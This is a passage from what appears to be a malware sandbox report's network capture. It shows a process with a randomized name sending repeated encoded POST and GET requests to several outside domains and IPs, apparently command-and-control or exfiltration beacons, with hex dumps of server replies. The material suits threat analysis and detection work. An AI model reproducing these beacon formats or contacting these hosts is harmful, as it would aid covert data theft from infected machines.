30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 4, 2024 04:17:53.050945997 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49991	66.29.146.173	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:54.894551039 CET	491	OUT	GET /7m52/?C4NDALSx=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGisUJnGlYgyjdPiRMJiII+hd/ZWCESvW+s+atoBx4v9eisrA7PU=&CR=QnXHBNIHO HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:17:55.594624996 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 04 Nov 2024 03:17:55 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 4, 2024 04:17:55.594652891 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49992	209.74.64.58	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:00.856242895 CET	744	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4f 50 77 73 79 34 6f 41 77 52 49 73 76 70 75 6e 7a 63 7a 45 70 6e 46 7a 50 4a 2f 4e 4c 4d 75 71 79 64 42 6f 47 4e 46 33 2f 78 53 50 7a 5a 65 4e 70 78 35 57 5a 64 70 71 78 2f 59 47 6c 37 43 35 61 77 49 68 6b 31 67 42 45 31 4c 68 2b 65 52 51 47 73 65 7a 43 73 67 71 4c 48 4a 4e 44 6c 4a 32 55 70 31 6d 39 6e 42 2b 4b 51 6a 39 6c 72 79 47 4a 69 52 6f 70 30 5a 48 6d 52 48 6a 67 49 39 6e 67 55 72 34 46 66 64 4f 7a 2f 70 50 68 55 74 7a 62 49 75 77 75 78 46 55 68 6e 56 31 4b 66 79 59 34 63 7a 76 32 55 38 50 43 6b 51 65 4a 6f 35 37 57 7a 67 71 56 4f 64 79 6c 33 41 76 79 67 44 75 Data Ascii: C4NDALSx=eVrf+qhLc5wnOPwsy4oAwRIsvpunzczEpnFzPJ/NLMuqydBoGNF3/xSPzZeNpx5WZdpqx/YGl7C5awIhk1gBE1Lh+eRQGsezCsgqLHJNDlJ2Up1m9nB+KQj9lryGJiRop0ZHmRHjgI9ngUr4FfdOz/pPhUtzbIuwuxFUhnV1KfyY4czv2U8PCkQeJo57WzgqVOdyl3AvygDu
Nov 4, 2024 04:18:01.566164970 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:18:01 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49993	209.74.64.58	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:03.391594887 CET	768	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4e 76 67 73 2b 35 6f 41 68 68 49 76 71 70 75 6e 36 38 7a 49 70 6e 5a 7a 50 4d 61 4b 4d 2f 47 71 7a 34 6c 6f 48 4d 46 33 79 52 53 50 71 70 65 49 6a 52 35 52 5a 64 6c 55 78 2b 6b 47 6c 2f 53 35 61 31 73 68 6c 43 55 47 45 6c 4c 76 6e 4f 52 53 5a 63 65 7a 43 73 67 71 4c 48 73 57 44 6c 78 32 55 59 46 6d 39 47 42 39 48 77 6a 2b 73 4c 79 47 43 43 52 73 70 30 5a 66 6d 51 61 30 67 4f 35 6e 67 52 58 34 47 4b 68 4a 6f 50 70 56 6c 55 74 73 57 34 33 75 75 78 41 71 6c 68 56 76 61 6f 4f 72 77 4b 75 31 71 6e 38 73 51 30 77 63 4a 71 68 4a 57 54 67 41 58 4f 6c 79 33 67 4d 49 39 55 6d 4e 51 4b 50 48 64 46 38 71 45 61 6d 7a 6c 37 53 76 67 43 56 42 33 51 3d 3d Data Ascii: C4NDALSx=eVrf+qhLc5wnNvgs+5oAhhIvqpun68zIpnZzPMaKM/Gqz4loHMF3yRSPqpeIjR5RZdlUx+kGl/S5a1shlCUGElLvnORSZcezCsgqLHsWDlx2UYFm9GB9Hwj+sLyGCCRsp0ZfmQa0gO5ngRX4GKhJoPpVlUtsW43uuxAqlhVvaoOrwKu1qn8sQ0wcJqhJWTgAXOly3gMI9UmNQKPHdF8qEamzl7SvgCVB3Q==
Nov 4, 2024 04:18:04.099097013 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:18:03 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49996	209.74.64.58	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:05.937882900 CET	1781	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4e 76 67 73 2b 35 6f 41 68 68 49 76 71 70 75 6e 36 38 7a 49 70 6e 5a 7a 50 4d 61 4b 4d 2f 65 71 79 4f 70 6f 47 76 74 33 7a 52 53 50 31 5a 65 4a 6a 52 34 4e 5a 64 74 51 78 2b 6f 57 6c 35 4f 35 61 54 67 68 78 6d 49 47 50 6c 4c 76 6f 75 52 54 47 73 66 78 43 76 59 6d 4c 48 63 57 44 6c 78 32 55 62 64 6d 70 48 42 39 46 77 6a 39 6c 72 79 61 4a 69 52 45 70 30 68 50 6d 51 65 6b 6a 39 78 6e 68 78 6e 34 48 38 31 4a 6b 50 70 54 70 30 73 35 57 34 4c 50 75 78 4e 54 6c 68 4a 56 61 76 6d 72 68 4c 47 32 76 30 4a 32 4e 53 31 37 53 37 5a 67 66 6a 30 42 4f 66 70 43 35 41 39 34 31 33 6a 36 54 71 62 50 59 6b 6c 37 46 62 53 50 37 4d 65 39 70 77 59 4b 6e 71 42 41 53 4d 2b 47 41 57 2b 55 4c 76 43 58 34 34 69 77 6a 55 79 4b 45 4e 49 46 69 62 51 71 5a 31 30 78 68 4a 70 66 2f 6f 51 67 35 47 2b 2f 58 52 67 7a 34 73 30 47 5a 70 72 6f 75 5a 57 73 6c 57 76 5a 48 68 49 43 6f 32 33 30 71 6b 42 43 75 4f 4d 72 30 44 4a 33 6e 57 45 64 52 47 36 4a 6d 52 2f 5a 36 4a 6e 38 37 [TRUNCATED] Data Ascii: C4NDALSx=eVrf+qhLc5wnNvgs+5oAhhIvqpun68zIpnZzPMaKM/eqyOpoGvt3zRSP1ZeJjR4NZdtQx+oWl5O5aTghxmIGPlLvouRTGsfxCvYmLHcWDlx2UbdmpHB9Fwj9lryaJiREp0hPmQekj9xnhxn4H81JkPpTp0s5W4LPuxNTlhJVavmrhLG2v0J2NS17S7Zgfj0BOfpC5A9413j6TqbPYkl7FbSP7Me9pwYKnqBASM+GAW+ULvCX44iwjUyKENIFibQqZ10xhJpf/oQg5G+/XRgz4s0GZprouZWslWvZHhICo230qkBCuOMr0DJ3nWEdRG6JmR/Z6Jn87VEC5LB95dxYR1v1lZmmrycDXT7XamuZeQpcaBYQdK0sezGyCWPxd/nq1SBhgYLrUofZC8gbtXSw7VZF8Sy9DWo1OTUEAVQlhsE0YMZKaxpLNfOZO1EQvSbpbtt9J+9e48b/UPdkBkFKYYcuG0gyeLqFrWegkoAKdjvv53GY/QyScFU8OFCeEtObbBGQ3NwWIKz02MNbVa2hatRWE/ozw4Fuof+NHjwCpPnsOJrmzJRvENaikz95q34/pC2We8Jsx9kg01exELUwey7BDopULQNaVzQPlBCeUDApvNwsaecg2z9ZUO3C37WZmY806/xi9VtBTaefG2oiMmukmjkM5iVLgxFhH0eDBw0ykRfhgZ/5OijTZb8/DTTLTvXlUxCx2g8magL52sMIbGc7c7Eh3GdsYEY55CocLEIPjPT5Told+CrWKpkJ+W96dg+wqfxX+RA7EcIUMIujBaECoV/T40IxPx0pbrEAWqygt5mk9sjUCevk7yH+qWH22p/qv2+fFdc+yBBx6wgh0PNSIYwba4O9MeUEZpwzfTQeXqTGy16iZoSevMRRfZexY5mIfISxGHE1aA/ku9YIJL1AwcQPPypE5xvKLLopnmg1E2MMKcvmsVfmnN3mKxX7sn25wgTZm3UFwHJZ2tVJ6vxu3sRzaZXQoGYrQt+/J6D [TRUNCATED]
Nov 4, 2024 04:18:06.649810076 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:18:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49997	209.74.64.58	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:08.483242035 CET	486	OUT	GET /khsn/?C4NDALSx=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ARbyn6J1ZPnqMM4jEypbCT5wZptZz1V3DzfdhNy5ByxLujVEuGk=&CR=QnXHBNIHO HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:18:09.187699080 CET	548	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:18:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49999	85.159.66.93	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:14.403366089 CET	741	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 41 38 45 2f 44 42 6d 6f 51 68 4d 54 76 51 4f 74 4d 75 4c 39 4f 65 64 6a 4e 30 77 33 61 4e 70 52 74 7a 67 59 42 58 68 37 63 59 56 57 58 62 4a 38 32 59 37 79 55 62 69 57 34 56 4b 59 77 47 79 67 41 58 53 31 55 33 39 78 44 61 47 4e 50 75 48 39 4d 68 74 76 59 47 62 55 6c 6e 64 71 77 7a 54 59 4a 78 51 7a 6e 30 31 66 68 4e 77 6a 2f 41 67 63 51 6e 39 52 68 47 61 52 57 5a 69 6e 35 47 41 46 50 50 47 35 55 66 4c 61 30 78 53 4a 63 33 43 36 63 31 69 52 77 4c 32 59 31 64 69 66 4c 54 42 69 45 36 2b 72 70 70 43 38 31 6a 64 52 76 48 75 59 62 37 59 48 6c 38 4d 66 71 52 36 72 69 30 47 78 Data Ascii: C4NDALSx=TGEGNAtzvXhjA8E/DBmoQhMTvQOtMuL9OedjN0w3aNpRtzgYBXh7cYVWXbJ82Y7yUbiW4VKYwGygAXS1U39xDaGNPuH9MhtvYGbUlndqwzTYJxQzn01fhNwj/AgcQn9RhGaRWZin5GAFPPG5UfLa0xSJc3C6c1iRwL2Y1difLTBiE6+rppC81jdRvHuYb7YHl8MfqR6ri0Gx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50000	85.159.66.93	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:17.031220913 CET	765	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 42 63 30 2f 46 6d 79 6f 57 42 4d 51 71 51 4f 74 47 4f 4c 78 4f 65 42 6a 4e 78 55 6e 62 2f 39 52 74 58 6b 59 41 56 5a 37 66 59 56 57 44 4c 4a 35 38 34 37 74 55 62 6d 65 34 55 6d 59 77 41 65 67 41 53 75 31 55 41 70 75 43 4b 47 31 52 4f 48 2f 42 42 74 76 59 47 62 55 6c 6a 4e 41 77 77 6a 59 4b 43 49 7a 6e 56 31 63 36 74 77 67 36 41 67 63 42 58 39 76 68 47 61 6e 57 59 2f 41 35 41 4d 46 50 4f 32 35 55 71 33 62 2f 78 53 44 42 48 44 77 56 31 71 61 34 34 33 42 71 2f 32 63 4b 51 39 39 4d 73 6a 78 31 61 43 66 6e 7a 39 54 76 46 32 71 62 62 59 74 6e 38 30 66 34 47 32 4d 74 41 6a 53 71 78 73 78 57 4d 51 6d 65 75 76 30 31 6e 36 6c 6d 65 57 34 37 67 3d 3d Data Ascii: C4NDALSx=TGEGNAtzvXhjBc0/FmyoWBMQqQOtGOLxOeBjNxUnb/9RtXkYAVZ7fYVWDLJ5847tUbme4UmYwAegASu1UApuCKG1ROH/BBtvYGbUljNAwwjYKCIznV1c6twg6AgcBX9vhGanWY/A5AMFPO25Uq3b/xSDBHDwV1qa443Bq/2cKQ99Msjx1aCfnz9TvF2qbbYtn80f4G2MtAjSqxsxWMQmeuv01n6lmeW47g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50001	85.159.66.93	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:18:19.580581903 CET	1778	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 42 63 30 2f 46 6d 79 6f 57 42 4d 51 71 51 4f 74 47 4f 4c 78 4f 65 42 6a 4e 78 55 6e 62 2b 46 52 74 6b 38 59 42 79 31 37 65 59 56 57 66 37 4a 34 38 34 36 78 55 66 79 67 34 55 36 69 77 44 71 67 42 30 61 31 